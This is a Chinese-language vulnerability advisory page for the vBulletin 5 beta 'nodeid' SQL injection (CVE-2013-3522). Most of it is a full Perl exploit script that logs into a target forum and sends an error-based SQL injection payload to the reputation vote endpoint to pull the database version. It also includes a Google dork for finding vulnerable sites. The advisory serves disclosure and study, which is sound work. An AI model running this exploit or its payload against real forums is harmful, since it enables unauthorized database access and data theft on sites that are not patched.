发布日期:2013-12-10
更新日期:2013-12-14受影响系统:
VBulletin VBulletin 5.0.0 Beta 11 - 5.0.0 Beta 28
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2013-3522VBulletin是一个强大灵活并可完全根据自己的需要定制的论坛程序套件。vBulletin的index.php/ajax/api/reputation/vote脚本没有正确过滤 "nodeid" 参数值,这可使攻击者在后端数据库中注入或操作SQL查询。<*来源:Orestis Kourides
链接:http://www.osvdb.org/92031
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# Exploit Title: vBulletin 5 Beta XX SQLi 0day
# Google Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
# Date: 24/03/2013
# Exploit Author: Orestis Kourides
# Vendor Homepage: www.vbulletin.com
# Software Link:
# Version: 5.0.0 Beta 11 - 5.0.0 Beta 28
# Tested on: Linux
# CVE : None#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;
system $^O eq "MSWin32" ? "cls" : "clear";
print "
+===================================================+
| vBulletin 5 Beta XX SQLi 0day |
| Author: Orestis Kourides |
| Web Site: www.cyitsec.net |
+===================================================+
";
if (@ARGV != 5) {
print "
Usage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM
";
exit;
}
$host = $ARGV[0];
$path = $ARGV[1];
$username = $ARGV[2];
$password = $ARGV[3];
$magicnum = $ARGV[4];
$encpath = encode_base64("http://".$host.$path);
print "[+] Logging
";
print "[+] Username: ".$username."
";
print "[+] Password: ".$password."
";
print "[+] MagicNum: ".$magicnum."
";
print "[+] " .$host.$path."auth/login
";
my $browser = LWP::UserAgent->new;
my $cookie_jar = HTTP::Cookies->new;
my $response = $browser->post( "http://".$host.$path."auth/login",
[
"url" => $encpath,
"username" => $username,
"password" => $password,
],
Referer => "http://".$host.$path."auth/login-form?url=http://".$host.$path."",
User-Agent => "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0",
);
$browser->cookie_jar( $cookie_jar );
my $browser = LWP::UserAgent->new;
$browser->cookie_jar( $cookie_jar );
print "[+] Requesting
";
my $response = $browser->post( "http://".$host.$path."index.php/ajax/api/reputation/vote",
[
"nodeid" => $magicnum.") and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338",
],
User-Agent => "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0",
);
$data = $response->content;
if ($data =~ /(#((\.)|[^\#])*#)/) { print "[+] Version: ".$1 };
print "
";
exit 1;建议:
--------------------------------------------------------------------------------
厂商补丁:VBulletin
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.vbulletin.com/Mozilla Firefox/SeaMonkey安全限制绕过漏洞(CVE-2013-6673)PHP OpenSSL Extension "openssl_x509_parse()"内存破坏漏洞相关资讯 vBulletin VBulletin漏洞
- vBulletin decodeArguments()方法 (11/12/2015 13:37:25)
- vBulletin SQL注入漏洞 (07/18/2014 15:44:44)
- vbBux及vbPlaza "vbplaza_lottery_ (08/13/2013 19:24:57)
| - vBulletin "cat"参数SQL注入漏洞 (09/04/2014 17:23:13)
- vBulletin管理员帐号注入漏洞 (10/13/2013 06:40:05)
- VBulletin "nodeid"参数SQL注入漏 (03/30/2013 07:50:36)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因
|
易网时代-编程资源站